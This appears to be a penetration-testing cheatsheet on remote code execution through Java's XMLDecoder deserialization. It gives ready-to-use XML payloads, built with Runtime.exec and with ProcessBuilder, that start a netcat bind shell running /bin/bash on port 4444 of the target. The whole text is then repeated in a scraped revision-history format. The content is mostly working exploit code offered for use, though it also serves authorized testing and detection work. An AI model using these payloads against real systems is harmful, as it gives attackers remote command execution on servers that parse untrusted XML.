mgeeky-Penetration-Testing-.../web/java-XMLDecoder-RCE.md

## Java Beans XMLDecoder Remote Code Execution cheatsheet

Having a functionality of file upload or other function that is parsing input xml-type data that will later flow through the **XMLDecoder** component of _Java Beans_, one could try to play around it's known deserialization issue. In order to test that issue there should be specially crafted XML-payload used that would invoke arbitrary Java interfaces and methods with supplied parameters.

### Payloads

When one would like to start a bind shell on the target machine, he could use the payload like the following one:
```
Runtime.getRuntime().exec(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"});
```

In such case desired XML would look like the following one:

```
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_102" class="java.beans.XMLDecoder">
 <object class="java.lang.Runtime" method="getRuntime">
      <void method="exec">
      <array class="java.lang.String" length="6">
          <void index="0">
              <string>/usr/bin/nc</string>
          </void>
          <void index="1">
              <string>-l</string>
          </void>
          <void index="2">
              <string>-p</string>
          </void>
          <void index="3">
              <string>4444</string>
          </void>
          <void index="4">
              <string>-e</string>
          </void>
          <void index="5">
              <string>/bin/bash</string>
          </void>
      </array>
      </void>
 </object>
</java>
```

or by using `ProcessBuilder`:

```
new java.lang.ProcessBuilder(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"}).start()
```

Then the payload would look like:

```
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_102" class="java.beans.XMLDecoder">
  <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="6">
      <void index="0">
        <string>/usr/bin/nc</string>
      </void>
      <void index="1">
         <string>-l</string>
      </void>
      <void index="2">
         <string>-p</string>
      </void>
      <void index="3">
         <string>4444</string>
      </void>
      <void index="4">
         <string>-e</string>
      </void>
      <void index="5">
         <string>/bin/bash</string>
      </void>
    </array>
    <void method="start" id="process">
    </void>
  </void>
</java>
```
First 2018-02-02 22:22:43 +01:00			`## Java Beans XMLDecoder Remote Code Execution cheatsheet`

			`Having a functionality of file upload or other function that is parsing input xml-type data that will later flow through the XMLDecoder component of _Java Beans_, one could try to play around it's known deserialization issue. In order to test that issue there should be specially crafted XML-payload used that would invoke arbitrary Java interfaces and methods with supplied parameters.`

			`### Payloads`

			`When one would like to start a bind shell on the target machine, he could use the payload like the following one:`
			```
			`Runtime.getRuntime().exec(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"});`
			```

			`In such case desired XML would look like the following one:`

			```
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<java version="1.8.0_102" class="java.beans.XMLDecoder">`
			`<object class="java.lang.Runtime" method="getRuntime">`
			`<void method="exec">`
			`<array class="java.lang.String" length="6">`
			`<void index="0">`
			`<string>/usr/bin/nc</string>`
			`</void>`
			`<void index="1">`
			`<string>-l</string>`
			`</void>`
			`<void index="2">`
			`<string>-p</string>`
			`</void>`
			`<void index="3">`
			`<string>4444</string>`
			`</void>`
			`<void index="4">`
			`<string>-e</string>`
			`</void>`
			`<void index="5">`
			`<string>/bin/bash</string>`
			`</void>`
			`</array>`
			`</void>`
			`</object>`
			`</java>`
			```

			or by using `ProcessBuilder`:

			```
			`new java.lang.ProcessBuilder(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"}).start()`
			```

			`Then the payload would look like:`

			```
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<java version="1.8.0_102" class="java.beans.XMLDecoder">`
			`<void class="java.lang.ProcessBuilder">`
			`<array class="java.lang.String" length="6">`
			`<void index="0">`
			`<string>/usr/bin/nc</string>`
			`</void>`
			`<void index="1">`
			`<string>-l</string>`
			`</void>`
			`<void index="2">`
			`<string>-p</string>`
			`</void>`
			`<void index="3">`
			`<string>4444</string>`
			`</void>`
			`<void index="4">`
			`<string>-e</string>`
			`</void>`
			`<void index="5">`
			`<string>/bin/bash</string>`
			`</void>`
			`</array>`
			`<void method="start" id="process">`
			`</void>`
			`</void>`
			`</java>`
			```